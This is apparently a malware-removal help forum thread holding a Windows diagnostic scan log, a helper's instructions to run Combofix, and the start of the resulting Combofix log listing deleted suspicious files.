Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2) (Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6425.1000 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 2.1.1116.0 - Microsoft Corporation) Hidden
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 2.1.1116.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.60831.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM\...\{67E03279-F703-408F-B4BF-46B5FC8D70CD}) (Version: 9.7.0621 - Microsoft Corporation)
Mozilla Firefox 12.0 (x86 en-US) (HKLM\...\Mozilla Firefox 12.0 (x86 en-US)) (Version: 12.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 12.0 - Mozilla)
MSXML 4.0 SP2 (KB927978) (HKLM\...\{37477865-A3F1-4772-AD43-AAFC6BCFF99F}) (Version: 4.20.9841.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Nikon Message Center 2 (HKLM\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.8.0 - Nikon)
Notepad++ (HKLM\...\Notepad++) (Version: 5.9.8 - )
NovaBench 3.0.4 (HKLM\...\{88603FC0-6B3C-442D-981E-E3D49F083548}_is1) (Version:  - Novawave Inc.)
NVIDIA 3D Vision Driver 311.06 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 311.06 - NVIDIA Corporation)
NVIDIA Control Panel 311.06 (Version: 311.06 - NVIDIA Corporation) Hidden
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version:  - )
NVIDIA ForceWare Network Access Manager (HKLM\...\InstallShield_{7CFA46E3-CC2F-4355-82AE-6012DC3633FD}) (Version: 1.00.6776 - NVIDIA Corporation)
NVIDIA ForceWare Network Access Manager (Version: 1.00.6776 - NVIDIA Corporation) Hidden
NVIDIA Graphics Driver 311.06 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 311.06 - NVIDIA Corporation)
NVIDIA Install Application (Version: 2.1002.108.688 - NVIDIA Corporation) Hidden
NVIDIA Stereoscopic 3D Driver (Version: 7.17.13.1106 - NVIDIA Corporation) Hidden
NVIDIA Update 1.11.3 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Update) (Version: 1.11.3 - NVIDIA Corporation)
NVIDIA Update Components (Version: 1.11.3 - NVIDIA Corporation) Hidden
OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
Opera 11.64 (HKLM\...\Opera 11.64.1403) (Version: 11.64.1403 - Opera Software ASA)
Opera Next 12.50 internal build 1497 (HKLM\...\Opera 12.50.1497) (Version: 12.50.1497 - Opera Software ASA)
Paint Shop Pro 5.0 (HKLM\...\Paint Shop Pro 5.0) (Version:  - )
Picture Control Utility (HKLM\...\{87441A59-5E64-4096-A170-14EFE67200C3}) (Version: 1.4.13 - Nikon)
QuickTime (HKLM\...\{0E64B098-8018-4256-BA23-C316A43AD9B0}) (Version: 7.72.80.56 - Apple Inc.)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5648 - Realtek Semiconductor Corp.)
Skype™ 6.11 (HKLM\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
Sothink SWF Decompiler (HKLM\...\{BCDB856C-D247-4DEE-9132-89C02F4D6B8C}_is1) (Version: 7.1 - SourceTec Software Co., LTD)
Steam (HKLM\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Uninstall Digital Binoculars Driver (HKLM\...\Digital Binoculars_is1) (Version:  - )
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for Microsoft .NET Framework 3.5 SP1 (KB963707) (HKLM\...\{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}.KB963707) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 Help for Common Features (KB963673) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_HOMESTUDENTR_{AB365889-0395-4FAD-B702-CA5985D53D42}) (Version:  - Microsoft)
Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version:  - Microsoft)
Update for Microsoft Office 2007 System (KB2539530) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0B4CEEAE-AA88-490C-BCB2-AAC3421981A4}) (Version:  - Microsoft)
Update for Microsoft Office Access 2007 Help (KB963663) (HKLM\...\{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISE_{6B76A18A-AA1E-42AB-A7AD-6C84BBB43987}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISE_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0409-0000-0000000FF1CE}_HOMESTUDENTR_{199DF7B6-169C-448C-B511-1054101BE9C9}) (Version:  - Microsoft)
Update for Microsoft Office Infopath 2007 Help (KB963662) (HKLM\...\{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISE_{716B81B8-B13C-41DF-8EAC-7A2F656CAB63}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 (KB980729) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{329050A9-EF80-40F9-B633-74508F54C1FF}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM\...\{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISE_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office OneNote 2007 Help (KB963670) (HKLM\...\{90120000-00A1-0409-0000-0000000FF1CE}_HOMESTUDENTR_{2744EF05-38E1-4D5D-B333-E021EDAEA245}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 (KB2583910) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{BDC21583-5601-4B2B-88F3-7919F6DE8FB1}) (Version:  - Microsoft)
Update for Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{0451F231-E3E3-4943-AB9F-58EB96171784}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISE_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0409-0000-0000000FF1CE}_HOMESTUDENTR_{397B1D4F-ED7B-4ACA-A637-43B670843876}) (Version:  - Microsoft)
Update for Microsoft Office Publisher 2007 Help (KB963667) (HKLM\...\{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISE_{2E40DE55-B289-4C8B-8901-5D369B16814F}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Script Editor Help (KB963671) (HKLM\...\{90120000-006E-0409-0000-0000000FF1CE}_HOMESTUDENTR_{CD11C6A2-FFC6-4271-8EAB-79C3582F505C}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISE_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
Update for Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0409-0000-0000000FF1CE}_HOMESTUDENTR_{80E762AA-C921-4839-9D7D-DB62A72C0726}) (Version:  - Microsoft)
Update for Outlook 2007 Junk Email Filter (KB2596560) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{2964DDE1-4925-4DF1-AF2C-0A36B3442228}) (Version:  - Microsoft)
VC 9.0 Runtime (Version: 1.0.0 - Check Point Software Technologies Ltd) Hidden
VC80CRTRedist - 8.0.50727.4053 (Version: 1.1.0 - DivX, Inc) Hidden
ViewNX 2 (HKLM\...\{E64C137C-D0B7-467A-B47F-460AAB30F0A3}) (Version: 2.8.0 - Nikon)
Vuze (HKLM\...\8461-7759-5462-8226) (Version: 4.7 - Vuze Inc.)
WinDirStat 1.1.2 (HKCU\...\WinDirStat) (Version:  - )
WinRAR 4.00 (32-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH)
ZoneAlarm Firewall (Version: 10.1.065.000 - Check Point Software Technologies Ltd.) Hidden
ZoneAlarm LTD Toolbar (HKLM\...\ZoneAlarm LTD Toolbar) (Version:  - Check Point Software Technologies)
ZoneAlarm Security (Version: 10.1.065.000 - Check Point Software Technologies Ltd.) Hidden
ZoneAlarm Security (Version: 10.2.047.000 - Check Point Software Technologies Ltd.) Hidden
Zoom (HKLM\...\{237FB6DF-B351-4567-9226-4CE4A9CBBEA8}) (Version: 1.0 - Zoom Video Communications, Inc.)

==================== Restore Points  =========================

Could not list Restore Points. Check "winmgmt" service or repair WMI.

==================== Hosts content: ==========================

2006-11-02 03:23 - 2006-09-18 14:41 - 00000761 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost
::1             localhost

==================== Scheduled Tasks (whitelisted) =============

Task: {1CC81347-6204-4B83-900C-01E02F50F067} - System32\Tasks\Microsoft\Windows\MobilePC\TMM
Task: {1F4208F5-190A-406D-BF63-577898F904B7} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup
Task: {268AB3AE-75B8-45C5-8FB7-9AF520BC528C} - System32\Tasks\4793 => Wscript.exe C:\Users\MIKEAN~1\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION
Task: {28288DDD-2F66-4CC9-ADE0-54157CAA86A0} - System32\Tasks\Express Files Updater => C:\Program Files\ExpressFiles\EFupdater.exe <==== ATTENTION
Task: {320124A7-D70F-41DE-A9D1-D5E8E19D5D91} - System32\Tasks\Microsoft\Windows\NetworkAccessProtection\NAPStatus UI
Task: {3BCDF251-CA5C-4045-A1FC-8FCEF9FBDC93} - System32\Tasks\Microsoft\Windows\Shell\CrawlStartPages
Task: {44980BEE-7809-44A9-AC24-D6E578A3B7DF} - System32\Tasks\Microsoft\Windows\RAC\RACAgent => C:\Windows\system32\RacAgent.exe [2008-01-20] (Microsoft Corporation)
Task: {59F41FC3-C3B3-4342-9101-18367415CF66} - System32\Tasks\0 => Iexplore.exe  <==== ATTENTION
Task: {70830A18-7CE6-49AE-8535-8E8A799CBAE2} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2011-11-16] (Google Inc.)
Task: {7EEEE5C7-3F7D-4088-BD12-7B5C896F8674} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2011-11-16] (Google Inc.)
Task: {A6742FBB-2DFC-4334-92E4-F899CD00A6F5} - System32\Tasks\Microsoft\Microsoft Antimalware\MP Scheduled Scan => C:\Program Files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2011-04-27] (Microsoft Corporation)
Task: {CAC7B090-951A-46AF-9373-5A3C6974468C} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-07-08] (Adobe Systems Incorporated)
Task: {E5150B95-F9B4-4D5D-95A2-7EC1ACBA95F8} - System32\Tasks\Microsoft\Windows\Wireless\GatherWirelessInfo => C:\Windows\system32\gatherWirelessInfo.vbs [2008-01-20] ()
Task: {EE905EB3-3699-44DF-A8E2-E7197CB85F22} - System32\Tasks\Microsoft\Windows\Tcpip\WSHReset => C:\Windows\system32\netsh.exe [2006-11-02] (Microsoft Corporation)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2012-01-08 06:41 - 2012-01-08 06:41 - 00093696 _____ () C:\Program Files\FileZilla FTP Client\fzshellext.dll
2011-04-24 10:34 - 2011-03-02 12:40 - 00140288 _____ () C:\Program Files\WinRAR\rarext.dll
2009-04-09 18:22 - 2007-03-05 09:22 - 00081920 _____ () C:\Program Files\FinePixViewerS\wia_register_event.dll

==================== Alternate Data Streams (whitelisted) =========

AlternateDataStreams: C:\ProgramData\TEMP:359B3BDA
AlternateDataStreams: C:\ProgramData\TEMP:430C6D84
AlternateDataStreams: C:\ProgramData\TEMP:9A870F8B
AlternateDataStreams: C:\ProgramData\TEMP:A8ADE5D8
AlternateDataStreams: C:\ProgramData\TEMP:C7DEC6B7
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2

==================== Safe Mode (whitelisted) ===================

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\08317434.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\59176720.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\08317434.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\59176720.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRkrn => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WRSVC => ""="Service"

==================== EXE Association (whitelisted) =============

==================== MSCONFIG/TASK MANAGER disabled items =========

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: ehRecvr => 3
MSCONFIG\Services: ehSched => 3
MSCONFIG\Services: ehstart => 2
MSCONFIG\Services: GameConsoleService => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: IswSvc => 2
MSCONFIG\Services: seclogon => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: WMPNetworkSvc => 3
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^MikeandBert^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^OneNote 2007 Screen Clipper and Launcher.lnk => C:\Windows\pss\OneNote 2007 Screen Clipper and Launcher.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: APSDaemon => "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: DivXUpdate => "C:\Program Files\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files\QuickTime\QTTask.exe" -atboottime

==================== Faulty Device Manager Devices =============

Name: Microsoft 6to4 Adapter #3
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

==================== Event log errors: =========================

Application errors:
==================
Error: (07/20/2014 00:17:54 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (07/20/2014 10:42:53 AM) (Source: System Restore) (EventID: 8193) (User: )
Description: Failed to create restore point on volume (Process = C:\Windows\system32\svchost.exe -k netsvcs; Descripton = Windows Update; Hr = 0x81000101).

Error: (07/20/2014 10:26:41 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (07/19/2014 04:32:56 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (07/19/2014 04:22:00 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application dllhost.exe, version 6.0.6000.16386, time stamp 0x4549b14e, faulting module unknown, version 0.0.0.0, time stamp 0x00000000, exception code 0xc0000005, fault offset 0x000c01e2,
process id 0x2328, application start time 0xdllhost.exe0.

Error: (07/19/2014 03:33:45 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: Home-PC)
Description: HRESULT:0x8004FF84
Description:Cannot complete the Security Essentials Upgrade. Security Essentials is not currently monitoring and helping to protect your computer. Please restart your computer and try again. Error code:0x8004FF84.

Error: (07/19/2014 03:32:31 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 9.0.8112.16561 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Problem Reports and Solutions control panel.
Process ID: a68
Start Time: 01cfa39fbc3fa431
Termination Time: 1225

Error: (07/19/2014 03:31:44 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program iexplore.exe version 9.0.8112.16561 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Problem Reports and Solutions control panel.
Process ID: 2874
Start Time: 01cfa39f8eeac0a1
Termination Time: 10418

Error: (07/19/2014 03:27:16 PM) (Source: MsiInstaller) (EventID: 11714) (User: Home-PC)
Description: Product: Microsoft Security Client -- Error 1714. The older version of Microsoft Security Client cannot be removed.  Contact your technical support group.  System Error 1612.

Error: (07/19/2014 03:10:35 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application dllhost.exe, version 6.0.6000.16386, time stamp 0x4549b14e, faulting module unknown, version 0.0.0.0, time stamp 0x00000000, exception code 0xc0000005, fault offset 0x000501e2,
process id 0x22fc, application start time 0xdllhost.exe0.

System errors:
=============
Error: (07/20/2014 00:19:32 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (07/20/2014 00:17:56 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: CSN5PDTS82
CSN5PDTS82x64

Error: (07/20/2014 00:16:55 PM) (Source: Print) (EventID: 19) (User: NT AUTHORITY)
Description: The print spooler failed to share printer Send To OneNote 2007 with shared resource name Send To OneNote 2007. Error 2114. The printer cannot be used by others on the network.

Error: (07/20/2014 00:16:44 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 12:15:07 PM on 7/20/2014 was unexpected.

Error: (07/20/2014 10:54:26 AM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer DOC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{EF6BA016-F284-490A-B0CE-D80828CE6304}.
The master browser is stopping or an election is being forced.

Error: (07/20/2014 10:46:30 AM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: 0x80070643Security Update for Microsoft Silverlight (KB2932677){C6BF131F-BE90-438C-BA58-A732368D8A96}201

Error: (07/20/2014 10:28:32 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (07/20/2014 10:28:21 AM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer DOC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{EF6BA016-F284-490A-B0CE-D80828CE6304}.
The master browser is stopping or an election is being forced.

Error: (07/20/2014 10:26:42 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: CSN5PDTS82
CSN5PDTS82x64

Error: (07/19/2014 04:39:25 PM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer DOC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{EF6BA016-F284-490A-B0CE-D80828CE6304}.
The master browser is stopping or an election is being forced.

Microsoft Office Sessions:
=========================

CodeIntegrity Errors:
===================================
  Date: 2014-07-20 12:20:57.410
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:20:56.989
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:20:56.615
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:20:56.225
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:04:01.703
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:04:01.284
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:04:00.887
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:04:00.477
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:03:50.356
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-07-20 12:03:49.965
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\avgidshx.sys because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Percentage of memory in use: 53%
Total physical RAM: 1789.8 MB
Available physical RAM: 830.36 MB
Total Pagefile: 3835.46 MB
Available Pagefile: 2495.39 MB
Total Virtual: 2047.88 MB
Available Virtual: 1905.55 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:69.52 GB) (Free:15.7 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (DATA) (Fixed) (Total:69.53 GB) (Free:39.77 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 149 GB) (Disk ID: F7F82EBE)
Partition 1: (Not Active) - (Size=10 GB) - (Type=27)
Partition 2: (Active) - (Size=70 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=70 GB) - (Type=07 NTFS)

==================== End Of Log ============================

#4 aharonov

  • Malware Response Team
  • 2,441 posts

Posted 20 July 2014 - 02:47 PM

Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#5 mcgrotty

  • Topic Starter
  • Members
  • 5 posts

Posted 20 July 2014 - 06:04 PM

ComboFix 14-07-20.02 - MikeandBert 07/20/2014  14:49:32.1.1 - x86
Running from: c:\users\MikeandBert\Desktop\ComboFix.exe
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
C:\END
c:\programdata\2380826522
c:\programdata\306e3167k4378pw12x73il28v4rnqxn
c:\users\MikeandBert\AppData\Roaming\Love
c:\users\MikeandBert\AppData\Roaming\Love\mari0\options.txt
c:\users\MikeandBert\AppData\Roaming\Microsoft\~DFKcba9d9.tmp
c:\users\Public\WINDOWS
c:\users\Public\WINDOWS\DigitalLocker\enUs\BITSCTRS.INI
c:\users\Public\WINDOWS\DigitalLocker\enUs\DXG.INI
c:\users\Public\WINDOWS\Microsoft.Net\Authmen\DJSVS.INI
c:\users\Public\WINDOWS\ModemLogs\AMDIDE.INI
c:\users\Public\WINDOWS\MSAgent\Chars\DRVLOCK.SYS
c:\users\Public\WINDOWS\MSAgent\Chars\SYMBIOS.SYS
c:\users\Public\WINDOWS\Panther\UnattendGC\BRMW.INI
c:\users\Public\WINDOWS\PLA\System\EPCL5UI.INI
c:\users\Public\WINDOWS\PLA\System\RASCTRS.INI
